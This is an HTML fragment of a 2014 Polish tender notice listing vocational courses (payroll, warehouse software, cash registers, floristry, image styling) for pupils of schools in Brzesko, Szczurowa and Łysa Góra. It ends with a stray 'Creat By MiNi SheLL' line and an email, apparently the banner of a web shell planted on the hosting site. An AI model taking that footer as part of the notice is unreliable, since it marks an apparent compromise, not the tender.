<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów. 

2.	Czas trwania kursu wynosi: 60 godzin lekcyjnych, w tym 20 godzin zajęć teoretycznych i 40 godzin zajęć praktycznych. 


3.	Program kursu musi obejmować, co najmniej następujące zagadnienia: Prawo pracy - zagadnienia ogólne oraz wewnętrzne źródła prawa pracy ( układy zbiorowe pracy, regulamin pracy, regulamin wynagrodzeń ). Nawiązanie stosunku pracy. Ochrona danych osobowych. Obowiązki pracownika i pracodawcy. Umowa o pracę. Umowy cywilno-prawne.  Podstawowa dokumentacja pracownicza -  Teczka Akt Osobowych. Zmiana warunków umowy o pracę. Zasady rozliczania czasu pracy ( praca w godzinach nadliczbowych, w porze nocnej, w niedziele i święta). Urlopy i zwolnienia od pracy. Odpowiedzialność materialna pracownika. Uprawnienia pracownika związane z rodzicielstwem.  BHP.  Rozwiązanie stosunku pracy.  Spory o roszczenia ze stosunku pracy. Związki zawodowe. Wynagrodzenie ze stosunku pracy ( systemy wynagrodzeń, dokumentacja wynagrodzeń, odszkodowania i odprawy, potrącenia z wynagrodzenia ). Wynagrodzenia na podstawie umów cywilnoprawnych - ujęcie składkowe i podatkowe. Pozapłacowe świadczenia pracownicze - ujęcie składkowe i podatkowe ( podróże służbowe, ryczałty i ekwiwalenty za używanie prywatnego samochodu do celów służbowych, ZFŚS, świadczenia urlopowe). Rozliczenia z Zus-em. Rozliczenia z urzędem skarbowym. Obowiązki pracodawcy w zakresie rozliczeń z PFRON. Program Płatnik - warsztaty. Obsługa programu kadrowo - płacowego Symfonia ,,Kadry i płace,, - warsztaty.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: Kurs obsługi programów magazynowych dla uczniów ZSP nr 1 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników zajęć - 12 uczniów.

2.	Czas trwania kursu wynosi: 30 godz. zajęć. 

3.	Tematyka kursu zawierać musi następujące zagadnienia: zapoznanie uczestników szkolenia z komputerowym sposobem obsługi gospodarki magazynowej, wprowadzanie danych dotyczących ewidencji zapasów tj. przychodów i rozchodów materiałowych i wyrobów gotowych, zakładanie kartotek magazynowych i kontrahentów, sporządzanie dowodów księgowych, Pz, Rw, Pw, Wz (wykorzystanie kartotek magazynowych ilościowo- wartościowych) faktury VAT (wykorzystanie kartotek dostawców i odbiorców), sporządzanie naklejek - szablony naklejek, sporządzanie kalkulacji cen - ustalanie cen sprzedaży towarów i wyrobów gotowych z uwzględnieniem narzutu zysku i marż, zapoznanie ze skrótami klawiaturowymi i ich zastosowanie w pracy z programem, prezentacja programów magazynowych, wykorzystanie czytników kodów kreskowych, sporządzanie aplikacji firm spedycyjnych - przygotowanie i sporządzania listów spedycyjnych, praktyczne wykorzystanie zdobytych umiejętności -ćwiczenia z zakresu poznanych wiadomości w formie sporządzenia projektu.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5: Kurs kadry i płace dla ZSP nr 1 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 12 uczniów  

2.	Czas trwania kursu wynosi: 30 godzin lekcyjnych, w tym 10 godzin zajęć teoretycznych i 20 godziny zajęć praktycznych.

3.	Kurs zawierał będzie między innymi zagadnienia:  prawo pracy, rozliczanie wynagrodzeń, podatek dochodowy od osób fizycznych, ubezpieczenia społeczne i zdrowotne, rozliczenia podróży służbowych, program PŁATNIK, obsługa programu kadrowo - płacowego, wykorzystanie programu Excel w tworzeniu listy płac.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6: Kurs specjalista ds. funduszy unijnych dla ZSP nr 1 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 12 uczniów  

2.	Czas trwania kursu wynosi: 30 godzin, w tym 10 godzin zajęć teoretycznych i 20 godzin zajęć praktycznych.

3.	Kurs musi uwzględniać, co najmniej: podstawy i ramy prawne wdrażania pomocy strukturalnej w Polsce; monitoring, kwalifikowalność, system finansowy oraz ewaluacja projektów współfinansowanych z Europejskiego Funduszu Rozwoju Regionalnego i Europejskiego Funduszu Społecznego; Fundusze strukturalne na lata 2013 - 2020 - cele polityki strukturalnej UE, narodowa strategia spójności, nowe programy operacyjne; Prawo Zamówień Publicznych w funduszach UE; Warsztaty z praktycznego przygotowywania wniosku wraz z pracą z generatorem wniosków.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7: Kurs obsługa nowoczesnych urządzeń IT stosowanych w handlu dla ZSP nr 1 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 12 uczniów  

2.	Czas trwania kursu wynosi: 24 godziny, w tym 5 godzin zajęć teoretycznych i 19 godzin zajęć praktycznych.

3.	Kurs musi uwzględniać, co najmniej dla części teoretycznej tematy: organizacja pracy kasjera,  odpowiedzialność materialna, kody kreskowe,  podatek od wartości dodanej, budowa elektronicznych kas fiskalnych, budowa palmtopów i ich wykorzystanie w handlu oraz dla części praktycznej: ćwiczenia praktyczne na kasie fiskalnej (podstawy programowania kas, obsługa czytników kodów kreskowych, współpraca kas z wagami elektronicznymi, obsługa terminali płatniczych), ćwiczenia w zakresie podstawowej obsługi palmtopów.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8: Kurs florystyczny I stopnia dla uczniów ZSP nr 1 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 12 uczniów. 

2.	Czas trwania kursu wynosi: 30 godz. lekcyjnych, w tym 6 godzin zajęć teoretycznych i 24 godziny zajęć praktycznych. 

3.	Tematyka kursu zawierać musi, co najmniej: organizację pracy kwiaciarni, omówienie narzędzi pracy florysty, florystykę okolicznościową, artystyczne pakowanie prezentów, dekorowanie stołów, dekorację kwiatów doniczkowych, sztukę układania kwiatów w naczyniach, podstawy florystyki ślubnej. W części praktycznej kursu każdy z uczestników wykona po jednej z wyżej wymienionych dekoracji. Wszystkie czynności mają być omawiane i demonstrowane przez instruktora, a następnie samodzielnie wykonywane przez uczestników kursu.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9: Kurs obsługi kas fiskalnych dla ZS w Szczurowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów. 

2.	 Kurs jest wyjazdowy i realizowany w siedzibie Wykonawcy lub miejscu wyznaczonym przez 
Wykonawcę przystosowanym do przeprowadzenia kursu. 

3.	Czas trwania kursu wynosi: 21 godzin (3 dni) - 7 godzin dziennie. 

4.	Tematyka kursu musi zawierać, co najmniej następujące zagadnienia: 
 
Cześć teoretyczna (7 godz.): Przepisy prawne związane z zawodem sprzedawcy  - przegląd aktów 
prawnych,  odpowiedzialność  kasjera, postępowanie z falsyfikatami,  kodowanie towarów, 
reklamacje i zwroty, kasy fiskalne jako szczególna forma dokumentacji sprzedaży, rozliczenie i 
odprowadzanie utargów, dokumentacja finansowa sprzedaży, faktury, paragony 
 
Cześć praktyczna (14 godz.): obsługa kas fiskalnych - rodzaje i zastosowanie urządzeń fiskalnych, 
programowanie kas fiskalnych, praktyczne ćwiczenia sprzedaży z zastosowaniem kasy fiskalnej,  
rozpoznawanie i kontrola znaków pieniężnych, kasy fiskalne jako szczególna forma dokumentacji sprzedaży- omówienie ustawy.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10: Kurs florystyczny I stopnia dla uczniów grupy I ZS w Szczurowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 10 uczniów. 

2.	Czas trwania kursu wynosi: 30 godz. lekcyjnych, w tym 6 godzin zajęć teoretycznych i 24 godziny zajęć praktycznych. 

3.	Tematyka kursu zawierać musi, co najmniej: organizację pracy kwiaciarni, omówienie narzędzi pracy florysty, florystykę okolicznościową, artystyczne pakowanie prezentów, dekorowanie stołów, dekorację kwiatów doniczkowych, sztukę układania kwiatów w naczyniach,  podstawy florystyki ślubnej. W części praktycznej kursu każdy z uczestników wykona po jednej z wyżej wymienionych dekoracji. Wszystkie czynności mają być omawiane i demonstrowane przez instruktora, a następnie samodzielnie wykonywane przez uczestników kursu. Wykonawca przy pomocy uczniów w porozumieniu z liderem przygotuje wystawę prac kursantów na terenie szkoły.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11: Kurs florystyczny I stopnia dla uczniów grupy II ZS w Szczurowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 10 uczniów. 

2.	Czas trwania kursu wynosi: 30 godz. lekcyjnych, w tym 6 godzin zajęć teoretycznych i 24 godziny zajęć praktycznych. 

3.	Tematyka kursu zawierać musi, co najmniej: organizację pracy kwiaciarni, omówienie narzędzi pracy florysty, florystykę okolicznościową, artystyczne pakowanie prezentów, dekorowanie stołów, dekorację kwiatów doniczkowych, sztukę układania kwiatów w naczyniach,  podstawy florystyki ślubnej. W części praktycznej kursu każdy z uczestników wykona po jednej z wyżej wymienionych dekoracji. Wszystkie czynności mają być omawiane i demonstrowane przez instruktora, a następnie samodzielnie wykonywane przez uczestników kursu. Wykonawca przy pomocy uczniów w porozumieniu z liderem przygotuje wystawę prac kursantów na terenie szkoły.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12: Kurs kreacji wizerunku dla uczniów Zespołu Szkół Technicznych i Ogólnokształcących 
w Łysej Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Liczba uczestników kursu - 15 uczniów.

2.	Czas trwania kursu wynosi 40 godzin, w tym 10 godzin teorii i 30 godzin praktyki.

3.	  Tematyka kursu musi zawierać: autoprezentacja w zawodzie hotelarza (przywitanie, przedstawianie się), predyspozycje do pracy, cechy psychiczne i fizyczne ,,idealnego,, hotelarza, właściwe zachowanie (co należy, a czego nie wolno robić), elementy etyki hotelarskiej; omówienie typów skóry oraz krótką analizę typów skóry uczestniczek kursu - skuteczny demakijaż oraz indywidualna pielęgnacja cery (dobór odpowiednich produktów, techniki demakijażu, dobór produktów w zakresie kosmetyki pielęgnacyjnej), analiza skóry twarzy każdej uczestniczki przy pomocy mikrokamery; odpowiednia kolorystyka makijażu (analiza cery uczestniczek, jak dobierać kolory, aby wyglądać ,,lepiej,, , dobór kolorystyki makijażu a typ urody); dobór odpowiednich produktów do makijażu; makijaż dzienny (techniki dostosowane do indywidualnych cech urody): dobór i aplikacja podkładu, technika modelowania oka, eksponowanie makijażem atutów urody; makijaż wieczorowy (techniki dostosowane do indywidualnych cech urody); klasyczna technika makijażu wieczorowego, makijaż smoky eyes, makijaż francuski); makijaż biznesowy; modelarz kształtu twarzy: optyczne wyszczuplenie twarzy, metoda światłocienia, aplikacja różu; stylizacja: omówienie czynników i ,,narzędzi,, , które należy uwzględnić przy kreowaniu wizerunku hotelarza, typy sylwetek, linie ciała a ubiór, rola makijażu i fryzury, stylizacja sylwetki kobiecej, analiza kolorystyczna.

Szczegółowy opis kursu zawarto w załączniku nr 1 do Specyfikacji Istotnych Warunków Zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com